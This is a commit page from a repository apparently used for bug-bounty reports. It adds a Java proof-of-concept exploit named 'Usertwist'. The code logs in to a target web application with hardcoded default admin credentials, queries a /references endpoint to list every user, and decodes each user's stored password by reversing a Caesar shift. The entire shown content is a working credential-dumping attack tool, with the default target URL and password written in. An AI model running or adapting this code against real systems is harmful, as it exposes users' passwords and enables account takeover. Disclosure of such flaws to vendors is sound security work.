Stage/bug-bounty-reports
4
0
Fork 0
Code Issues 3 Pull Requests Actions Packages Projects Releases 2 Wiki Activity

First commit

Browse Source
This commit is contained in:
Mateo
2024-08-01 10:33:22 +02:00
commit 41f7a3d095
10 changed files with 195 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

74
src/fr/motysten/usertwist/exploit/Main.java Normal file
View File

@@ -0,0 +1,74 @@
package fr.motysten.usertwist.exploit;
import fr.motysten.usertwist.exploit.tools.Cesar;
import org.json.JSONArray;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
public class Main {
public static String link = "https://poc.athelas.fr";
public static String username = "admin";
public static String password = "AdminSecret1C";
public static void main(String[] args) throws IOException, InterruptedException {
BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
System.out.println("Usertwist exploit by Motysten");
String readLine;
System.out.println("Please enter the URL to attack (leave empty to use default) :");
readLine = reader.readLine();
if (!readLine.isEmpty()) {link = readLine;}
System.out.println("Please enter the used username (leave empty to use default) :");
readLine = reader.readLine();
if (!readLine.isEmpty()) {username = readLine;}
System.out.println("Please enter the password (leave empty to use default) :");
readLine = reader.readLine();
if (!readLine.isEmpty()) {password = readLine;}
HttpClient client = HttpClient.newHttpClient();
JSONObject requestJSON = new JSONObject();
requestJSON.put("username", username);
requestJSON.put("password", password);
HttpRequest request = HttpRequest.newBuilder(URI.create(link + "/login"))
.POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
.build();
HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());
JSONObject responseObject = new JSONObject(response.body());
String token = responseObject.optString("token");
requestJSON = new JSONObject();
requestJSON.put("term", "");
requestJSON.put("entity", "users");
request = HttpRequest.newBuilder(URI.create(link + "/references"))
.POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
.setHeader("Authorization", "Bearer " + token)
.build();
response = client.send(request, HttpResponse.BodyHandlers.ofString());
JSONArray usersArray = new JSONArray(response.body());
for (int i = 0; i < usersArray.length(); i++) {
JSONObject user = usersArray.getJSONObject(i);
String login = user.getString("username");
String password = Cesar.cesarRotate(user.getString("data"), -4);
System.out.println(login + " => " + password);
}
}
}

34
src/fr/motysten/usertwist/exploit/tools/Cesar.java Normal file
View File

@@ -0,0 +1,34 @@
package fr.motysten.usertwist.exploit.tools;
public class Cesar {
public static String cesarRotate(String input, int offset) {
String LOWER_ALPHABET = "abcdefghijklmnopqrstuvwxyz";
if (offset < 0) {
LOWER_ALPHABET = new StringBuilder(LOWER_ALPHABET).reverse().toString();
offset = -offset;
}
String UPPER_ALPHABET = LOWER_ALPHABET.toUpperCase();
StringBuilder output = new StringBuilder();
for (int i = 0; i < input.length(); i++) {
char newChar = input.charAt(i);
if (!Character.isDigit(input.charAt(i))) {
int pos = LOWER_ALPHABET.indexOf(Character.toLowerCase(input.charAt(i)));
int newPos = (pos + offset) % 26;
if (Character.isUpperCase(input.charAt(i))) {
newChar = UPPER_ALPHABET.charAt(newPos);
} else {
newChar = LOWER_ALPHABET.charAt(newPos);
}
}
output.append(newChar);
}
return output.toString();
}
}